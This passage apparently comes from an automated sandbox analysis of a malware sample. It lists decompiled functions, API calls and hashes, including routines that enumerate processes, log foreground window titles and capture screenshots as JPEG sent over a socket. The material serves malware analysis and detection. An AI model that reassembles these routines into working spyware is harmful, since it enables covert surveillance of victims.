Uniqueness Score: -1.00%

Function 00404B61, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046B164), ref: 00404C4E
CreateThread.KERNEL32(00000000,00000000,?,0046B118,00000000,00000000), ref: 00404C61
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404AFB,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00404C6C
CloseHandle.KERNEL32(00000000,?,?,00404AFB,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00404C75

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 9089f391d464be779911845b537a91e7e33059d30fcbadd0225bea45df7e8184
Instruction ID: aa20fc8878cbc9f0a69a096eb387a4b98a7e7ff33cd46a446b312f8eb46a14cc
Opcode Fuzzy Hash: 9089f391d464be779911845b537a91e7e33059d30fcbadd0225bea45df7e8184
Instruction Fuzzy Hash: 354171B1904208ABCF10EBA1CC559EFB77CAF94324F04016EF952B32D1DB79A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3D9, Relevance: 6.1, APIs: 4, Instructions: 127
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D3D9(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E0040201F(__ebx, __ecx);
				 *0x46aea1 = L00416F93(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0040412C(_t76,  &_v28,  &_v864);
						_t47 = L00416C0A(_t76,  &_v340, L00416FC1(_v892) & 0x000000ff);
						_t48 = L00416C0A(_t76,  &_v316, _v892);
						_t50 = L00416D80(_t76,  &_v268, L00416FF7( &_v292, _v892));
						L00401F1B(_t129, _t58, _t130, E004051FC(_t76,  &_v52, L00402E54( &_v76, E004051FC(_t76,  &_v100, L00402E54( &_v124, E004051FC(_t76,  &_v148, L00402E54( &_v172, E004051FC(_t76,  &_v196, E00407027(_t76,  &_v220, _t129, __eflags, L00416D80(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x45f644), _t50), _t129, __eflags, 0x45f644), _t48), _t129, __eflags, 0x45f644), _t47), _t129, __eflags, 0x45eb44));
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401E54();
						L00401F11();
						L00401F11();
						L00401E54();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}

0x0040d3d9
0x0040d3d9
0x0040d3e4
0x0040d3e6
0x0040d3f4
0x0040d3ff
0x0040d403
0x0040d40f
0x0040d41b
0x0040d59a
0x0040d430
0x0040d44e
0x0040d465
0x0040d489
0x0040d50a
0x0040d512
0x0040d51a
0x0040d522
0x0040d52a
0x0040d535
0x0040d540
0x0040d54b
0x0040d556
0x0040d561
0x0040d56c
0x0040d577
0x0040d582
0x0040d58d
0x0040d595
0x0040d595
0x0040d5b1
0x0040d5b1
0x0040d5be

APIs

Part of subcall function 00416F93: GetCurrentProcess.KERNEL32(?,?,?,00417A54,WinDir,00000000,00000000), ref: 00416FA4
Part of subcall function 00416F93: IsWow64Process.KERNEL32(00000000,?,?,00417A54,WinDir,00000000,00000000), ref: 00416FAB

CreateToolhelp32Snapshot.KERNEL32 ref: 0040D3F9
Process32FirstW.KERNEL32(00000000,?), ref: 0040D41B
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D5A2
CloseHandle.KERNEL32(00000000), ref: 0040D5B1

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
String ID:
API String ID: 715332099-0
Opcode ID: 8886cb535b241f445400fea0fc7262c714c246cb8b784bc39c0ebb6aced26215
Instruction ID: 6415fa9ffb8ec33853465bcbaca92ce48646af420cfeafea41d222de91e4b3ff
Opcode Fuzzy Hash: 8886cb535b241f445400fea0fc7262c714c246cb8b784bc39c0ebb6aced26215
Instruction Fuzzy Hash: ED415E319041199AC719FB61DC56AEEB374AF54318F1001BEF50A721E2EF385E8ACE58

Uniqueness

Uniqueness Score: -1.00%

Function 0040845A, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040845A() {
				char _v1004;
				char _v1012;
				char _v1028;
				void* _v1036;
				char _v1056;
				void* _v1060;
				char _v1080;
				void* _v1084;
				void* _t14;
				signed int _t16;
				void* _t28;
				void* _t30;
				void* _t32;
				void* _t33;
				void* _t55;
				void* _t57;
				signed int _t58;
				signed int _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				_t59 = _t58 & 0xfffffff8;
				_t65 = _t59;
				_t60 = _t59 - 0x434;
				_push(_t32);
				_t55 = Sleep;
				_t57 = _t33;
				while(1) {
					L004315B0(_t55,  &_v1004, 0, 0x3e8);
					_t61 = _t60 + 0xc;
					while(1) {
						_t14 = L00401DAD(0x46b558, _t52, _t65, 0x2a);
						_t62 = _t61 - 0x18;
						E00402036(_t32, _t62, _t52, _t65, _t14);
						_t16 = E0041743E( &_v1012, _t52);
						_t61 = _t62 + 0x18;
						_t65 = _t16;
						if(_t16 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t52 = E0040713C(_t32,  &_v1056, "\r\n[ ", _t55, __eflags, L00401FCE(_t32,  &_v1028,  &_v1004));
					L00401F1B(_t57 + 4, _t19, _t57, E004051FC(_t32,  &_v1080, _t19, _t55, __eflags, " ]\r\n"));
					L00401F11();
					L00401F11();
					L00401F11();
					_t63 = _t61 - 0x18;
					L00406E88(_t32, _t63, _t52, __eflags, _t57 + 0x60);
					E00408215(_t57, __eflags);
					while(1) {
						_t28 = L00401DAD(0x46b558, _t52, __eflags, 0x2a);
						_t64 = _t63 - 0x18;
						E00402036(_t32, _t64, _t52, __eflags, _t28);
						_t30 = E0041743E(0, _t52);
						_t60 = _t64 + 0x18;
						__eflags = _t30;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					L00408D8E();
				}
			}

0x0040845d
0x0040845d
0x00408460
0x00408466
0x00408469
0x0040846f
0x00408471
0x0040847d
0x00408482
0x00408485
0x0040848c
0x00408491
0x00408497
0x004084a0
0x004084a5
0x004084a8
0x004084aa
0x00000000
0x00000000
0x004084b1
0x004084b1
0x004084d8
0x004084e8
0x004084f1
0x004084fa
0x00408503
0x00408508
0x00408511
0x00408518
0x0040851d
0x00408524
0x00408529
0x0040852f
0x00408536
0x0040853b
0x0040853e
0x00408540
0x00000000
0x00000000
0x00408544
0x00408544
0x0040854a
0x0040854a

APIs

Part of subcall function 0041743E: GetForegroundWindow.USER32(73B76490,?), ref: 0041744E
Part of subcall function 0041743E: GetWindowTextLengthA.USER32(00000000), ref: 00417457
Part of subcall function 0041743E: GetWindowTextA.USER32 ref: 0041748A

Sleep.KERNEL32(000001F4), ref: 004084B1
Sleep.KERNEL32(00000064), ref: 00408544

Strings

], xrefs: 004084B5
[ , xrefs: 004084C9

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 254f0d784ef6b3a5ef732d002b325873735421dde1c697269df660abb5303708
Instruction ID: a49849c500c6c011c272f14cd677154c48944b501fdcf979f2d5a6495ab951c5
Opcode Fuzzy Hash: 254f0d784ef6b3a5ef732d002b325873735421dde1c697269df660abb5303708
Instruction Fuzzy Hash: 8721CF7160420067C508B776CD179AF72689B81308F80453FF582661E2FE7DAA05869B

Uniqueness

Uniqueness Score: -1.00%

Function 0043BC63, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d95d7f27541767c537730b17c9d4ad18b72c233e1f253afb1d2176d7912d84a
Instruction ID: b1f314485bb0011b137d231586a7ec42da69ec71370b8d478a0af01b1e41b1ab
Opcode Fuzzy Hash: 7d95d7f27541767c537730b17c9d4ad18b72c233e1f253afb1d2176d7912d84a
Instruction Fuzzy Hash: 120184B26092157EF63026696CC1F67221CDF5A3B9F20333FB621512D2DF688C4151A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043BCE2, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0a6af3b5c348e3703c77d1bd200f78a81d9a78a33512a4de0b46acf00569d0
Instruction ID: 9be10111673b843cae8dbab42f70a603dfb2fecb9e42c43d5a11ac97f937238d
Opcode Fuzzy Hash: 1a0a6af3b5c348e3703c77d1bd200f78a81d9a78a33512a4de0b46acf00569d0
Instruction Fuzzy Hash: 4D012BB22092023EB720197A2CC0E27771CDF9A3B8B30236BF621552D5DF788C0041A9

Uniqueness

Uniqueness Score: -1.00%

Function 004407E3, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000001,00000000,00000000,?,0044078A,00000001,00000000,00000000,00000000,?,00440AB6,00000006,FlsSetValue), ref: 00440815
GetLastError.KERNEL32(?,0044078A,00000001,00000000,00000000,00000000,?,00440AB6,00000006,FlsSetValue,00458008,00458010,00000000,00000364,?,00440564), ref: 00440821
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044078A,00000001,00000000,00000000,00000000,?,00440AB6,00000006,FlsSetValue,00458008,00458010,00000000), ref: 0044082F

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 413e70c582b0218e516274c09b1573be017c0a0d09b057b93b8b42b70f6201df
Instruction ID: 1d34c0f98b604e53d5312fb82e7ebf9b16639c37331c8e28a23a6a4ce9a5dc64
Opcode Fuzzy Hash: 413e70c582b0218e516274c09b1573be017c0a0d09b057b93b8b42b70f6201df
Instruction Fuzzy Hash: 39012B32601722EBD7215B79AD44A573B98EF457A17200637FB06E3241DB34DD11C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0041735B, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041735B(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E004023A3(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, L00401EF9(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x0041735e
0x0041735f
0x00417362
0x00417364
0x0041737e
0x00417383
0x00417395
0x00417399
0x004173a7
0x004173ba
0x004173bc
0x004173bc
0x004173bf
0x004173c5
0x00417385
0x00417385
0x00417385
0x004173cc

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408766), ref: 00417378
GetFileSize.KERNEL32(00000000,00000000,?,?,00408766), ref: 0041738C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00408766), ref: 004173B1
CloseHandle.KERNEL32(00000000,00408766), ref: 004173BF

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: ab79bb9622c851e55f080b7cb35398380ed196fbf0637c6999aa5fa4fcb90a98
Instruction ID: ef30135e11e82910366d825e95b3e6628e5434dbdff582c5503b2cec3dda67bc
Opcode Fuzzy Hash: ab79bb9622c851e55f080b7cb35398380ed196fbf0637c6999aa5fa4fcb90a98
Instruction Fuzzy Hash: 7001D6B454020CBFE7105B619C85EFF377CEB46365F1002AAFC10A3281CA789E01A675

Uniqueness

Uniqueness Score: -1.00%

Function 00416FF7, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,00000000,00000000), ref: 0041700C
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0041702E
CloseHandle.KERNEL32(00000000), ref: 00417039
CloseHandle.KERNEL32(00000000), ref: 00417041

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: f266cec72c631c02e23f5bad361eb8577ec6b186fefecdc6f9b77769b88e87e8
Instruction ID: 5f6b82a99aa2c689effda73cff197fd056405f4603da7d27c84166fe60ca9369
Opcode Fuzzy Hash: f266cec72c631c02e23f5bad361eb8577ec6b186fefecdc6f9b77769b88e87e8
Instruction Fuzzy Hash: FCF0E93128430967D66057549C0DFAB3B7CC789B52F100177F705D2192EEA8DCC186AE

Uniqueness

Uniqueness Score: -1.00%

Function 00440A8F, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 00440AD1

Strings

@, xrefs: 00440AC7
\^)|/, xrefs: 00440A95
FlsSetValue, xrefs: 00440AAA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Value
String ID: FlsSetValue$\^)|/$@
API String ID: 3702945584-3573063976
Opcode ID: 1dee507c469ea73f840d547765f441eb85bf917810ac2d06bda3d9e0305d7e1b
Instruction ID: d088049effd7cf50ac07203718cd2addf673accf6763a358697a0d1c7dfa3c42
Opcode Fuzzy Hash: 1dee507c469ea73f840d547765f441eb85bf917810ac2d06bda3d9e0305d7e1b
Instruction Fuzzy Hash: 06F02731640318B7CB10AF109C02E6EBB55EF04B12B40006BFC0536242DDB55E2896DE

Uniqueness

Uniqueness Score: -1.00%

Function 00440A39, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000), ref: 00440A78

Strings

@, xrefs: 00440A6E
FlsGetValue, xrefs: 00440A54
\^)|/, xrefs: 00440A3F

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Value
String ID: FlsGetValue$\^)|/$@
API String ID: 3702945584-565082217
Opcode ID: e8f75ae3542d16502c9d1daa1af2c66e1f2064db235eb21ace356ab46f883bb9
Instruction ID: 3ceec1c1eaa6a12739fc86a6f5a26e46a1b405bb5027dada9fa55a06ec754dea
Opcode Fuzzy Hash: e8f75ae3542d16502c9d1daa1af2c66e1f2064db235eb21ace356ab46f883bb9
Instruction Fuzzy Hash: 2CE0E531B40318B7D710AB619C02E6EBB64DB15B02B91006FFD0567282DDB59E14CADE

Uniqueness

Uniqueness Score: -1.00%

Function 004313B1, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004313B1() {
				void* _t4;
				void* _t8;

				L004345F1();
				E00431345();
				if(L00434845() != 0) {
					_t4 = L004347F7(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						L00434881();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004313b1
0x004313b6
0x004313c2
0x004313c7
0x004313cc
0x004313ce
0x004313d9
0x004313d0
0x004313d0
0x00000000
0x004313d0
0x004313c4
0x004313c4
0x004313c6
0x004313c6

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004313B1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004313B6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004313BB

Part of subcall function 00434845: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00434856

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004313D0

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction ID: e6f109528301bc6e036a8948ca6d628e266f39f85d7564bfb002dceb0de702c5
Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction Fuzzy Hash: 24C002484051C0916C9476B611021EE13482F9F38CF90348BAE5117E638E4D641A603F

Uniqueness

Uniqueness Score: -1.00%

Function 00414015, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00414015(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v112;
				intOrPtr _v116;
				intOrPtr _v144;
				char _v196;
				char _v220;
				void* _v224;
				char _v244;
				void* _v248;
				char _v268;
				void* _v272;
				char _v292;
				void* _v296;
				char _v300;
				char _v308;
				char _v316;
				void* _v320;
				char* _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v340;
				void* _v344;
				void* _v352;
				intOrPtr _v356;
				char _v364;
				void* _v368;
				char _v380;
				char _v384;
				void* _v392;
				char _v404;
				signed int _v432;
				char _v448;
				char _v452;
				void* _v476;
				char _v480;
				intOrPtr _v484;
				char _v492;
				char _v500;
				char _v504;
				char _v512;
				char _v516;
				void* __ebx;
				void* __edi;
				intOrPtr* _t63;
				void* _t86;
				void* _t98;
				void* _t99;
				intOrPtr* _t125;
				char* _t134;
				intOrPtr _t192;
				intOrPtr* _t203;
				signed int _t218;
				void* _t220;
				void* _t221;

				_t187 = __edx;
				_t220 = (_t218 & 0xfffffff8) - 0x1ac;
				 *0x46ad6c = _a4;
				_v432 = __ecx & 0x000000ff;
				E0041437F( &_v380, __edx, __eflags, _a4);
				if(E004023D3() != 0) {
					_t134 =  &_v380;
					_t63 =  *0x46ad10(L00401EF9(_t134), E004023D3());
					_t125 = _t63;
					L00413E93( &_v364, _t125);
					L004146EB(L"image/jpeg",  &_v300);
					_v356 = 1;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v336 = 1;
					_v332 = 4;
					_v328 =  &_v448;
					_t203 =  *0x46ad10(0, 0, _t134);
					L00413F2F( &_v308,  &_v380, _t203,  &_v308,  &_v364);
					 *((intOrPtr*)( *_t203 + 0x30))(_t203,  &_v112, 1);
					E00405107(_t125,  &_v452,  &_v300, _t203, _v116, 0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x18], xmm0");
					 *((intOrPtr*)( *_t203 + 0x14))(_t203, _v484, _v480, 0, 0);
					 *((intOrPtr*)( *_t203 + 0xc))(_t203, L00401EF9( &_v480), _v144, 0);
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					 *((intOrPtr*)( *_t203 + 8))(_t203);
					_t86 = E0043A49A( &_v504, E004023D3(),  &_v516, 0xa);
					_t221 = _t220 + 0xc;
					__eflags =  *0x46ad67 - 1;
					if( *0x46ad67 != 1) {
						__eflags =  *0x46b87c - 0xffffffff;
						if(__eflags != 0) {
							L00402ECA(_t125, _t221 - 0x18, E00407160( &_v384,  &_v492, __eflags, 0x46b218), __eflags,  &_v480);
							_push(0x4d);
							L0040495D(_t125, 0x46b878, _t88, __eflags);
						} else {
							E0040484C(0x46b878);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E004048C2( &_v300);
							L00404A44(0x46b878, 0x4149fd);
							_t98 = L00416D1F( &_v404, 0x46b860);
							_t192 =  *0x46ad68; // 0x0
							_t99 = L00416C0A(0x46b878,  &_v196, _t192);
							L00402E54(_t221 - 0xfffffffffffffff8, L00402ECA(0x46b878,  &_v364, L00402E54( &_v340, L00402ECA(0x46b878,  &_v316, L00402ECA(0x46b878,  &_v292, L00402ECA(0x46b878,  &_v268, L00402ECA(0x46b878,  &_v244, E00407160( &_v220,  &_v512, __eflags, 0x46b218), __eflags,  &_v500), __eflags, 0x46b218), __eflags, 0x46b830), __eflags, 0x46b218), _t99), __eflags, 0x46b218), _t98);
							_push(0x10);
							L0040495D(0x46b878, 0x46b878, _t107, __eflags);
							L00401F11();
							L00401F11();
							L00401F11();
							L00401F11();
							L00401F11();
							L00401F11();
							L00401F11();
							L00401F11();
						}
						L00401F11();
					} else {
						L00404CC1(_t86, 0x46b878);
					}
					L00413EB9(L00401F11(),  &_v452);
				} else {
					if( *0x46ad67 != 1) {
						__eflags =  *0x46b87c - 0xffffffff;
						if(__eflags == 0) {
							E0040484C(0x46b878);
							_t220 = _t220 - 0x10;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E004048C2(__edx);
						}
						E00402036(0x46b878, _t220 - 0x18, _t187, __eflags, 0x46b830);
						_push(0x4e);
						L0040495D(0x46b878, 0x46b878, _t187, __eflags);
					} else {
						L00404CC1(_t60, 0x46b878);
					}
				}
				return L00401F11();
			}

0x00414015
0x0041401b
0x0041402f
0x00414035
0x00414039
0x0041404a
0x004140b5
0x004140bf
0x004140c6
0x004140cd
0x004140de
0x004140ef
0x004140f3
0x004140f4
0x004140f5
0x004140f6
0x004140f9
0x00414102
0x0041410e
0x0041411b
0x0041412f
0x00414141
0x00414150
0x00414157
0x0041415c
0x0041416b
0x00414184
0x0041418a
0x00414190
0x004141a4
0x004141a9
0x004141ac
0x004141b3
0x004141c4
0x004141cb
0x0041433f
0x00414345
0x0041434c
0x004141d1
0x004141d8
0x004141e9
0x004141ea
0x004141eb
0x004141ec
0x004141ed
0x004141f9
0x0041420a
0x0041420f
0x00414228
0x004142aa
0x004142b0
0x004142b4
0x004142c0
0x004142cc
0x004142d8
0x004142e4
0x004142f0
0x004142fc
0x00414308
0x00414314
0x00414314
0x00414358
0x004141b5
0x004141ba
0x004141ba
0x0041436a
0x0041404c
0x00414053
0x00414064
0x00414070
0x00414074
0x00414079
0x00414085
0x00414086
0x00414087
0x00414088
0x00414089
0x00414089
0x00414098
0x0041409d
0x004140a1
0x00414055
0x0041405a
0x0041405a
0x00414053
0x0041437e

APIs

Part of subcall function 0041437F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0041439A
Part of subcall function 0041437F: CreateCompatibleDC.GDI32(00000000), ref: 004143A6

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 004140BF
SHCreateMemStream.SHLWAPI(00000000), ref: 00414115

Part of subcall function 00404CC1: closesocket.WS2_32(?), ref: 00404CC7

Strings

image/jpeg, xrefs: 004140D9

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$Stream$Compatibleclosesocket
String ID: image/jpeg
API String ID: 3038386933-3785015651
Opcode ID: a698991288899865357d9595ae7f62942b0bdd80e78324a1b10eeef31e4819be
Instruction ID: bbc7ff63c353f16987f318fafc32b27a72ed41d34e3b64f914bfb6db637b498f
Opcode Fuzzy Hash: a698991288899865357d9595ae7f62942b0bdd80e78324a1b10eeef31e4819be
Instruction Fuzzy Hash: 86819E316082409BC324FB61C855AEF73A9AFC5314F10493EF586971D2EF789985CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0043E79D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0043E82D

Strings

pow, xrefs: 0043E805, 0043E822

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 45b58d1a13f854dddf09752e707fac871df38629d5666caf78632f89588db3e7
Instruction ID: f5bf976d9cb9ffe7d718fae0c30c852f41d632f6446fd29fe49caf7e18677d01
Opcode Fuzzy Hash: 45b58d1a13f854dddf09752e707fac871df38629d5666caf78632f89588db3e7
Instruction Fuzzy Hash: 685166A1E0A202D6EB197716C94136B3B94EB04710F249D6BF095423E9EB3CCC919B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00445A79, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044564C: GetOEMCP.KERNEL32(00000000,?,?,004458D5,?), ref: 00445677

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044591A,?,00000000), ref: 00445AED
GetCPInfo.KERNEL32(00000000,0044591A,?,?,?,0044591A,?,00000000), ref: 00445B00

Strings

\^)|/, xrefs: 00445A81

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: \^)|/
API String ID: 546120528-265608074
Opcode ID: a0e1a59a232733b64d6e513abc711c52787142b86f2710323d9e625aeca71d4e
Instruction ID: 99c21209a1cbc993fb9c969589ab4bf806f0d61ccdd4898b765a00adb4d7c75b
Opcode Fuzzy Hash: a0e1a59a232733b64d6e513abc711c52787142b86f2710323d9e625aeca71d4e
Instruction Fuzzy Hash: CF513470904B459FFF208F61C8816BBBBA4EF41304F14806FD0568B253EA7CA946CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00444775, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

sOD, xrefs: 00444805, 004448FC
sOD, xrefs: 00444788

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: sOD$sOD
API String ID: 0-1814457307
Opcode ID: 151c82b2c0807398592469ad45eaa1f75ec18920ce96aec94e302bfcdb88910c
Instruction ID: 9f05d0932772dbf2e7039445c79bdec19a9e7c02dad2b68e0ade9903911f6565
Opcode Fuzzy Hash: 151c82b2c0807398592469ad45eaa1f75ec18920ce96aec94e302bfcdb88910c
Instruction Fuzzy Hash: A4516E35E04245EBEB20EF54C882BAB77B0FF55310F24416BD454AB391D7789A42CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB59, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABA0
ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0043AC20

Strings

\^)|/, xrefs: 0043AB68

Memory Dump Source

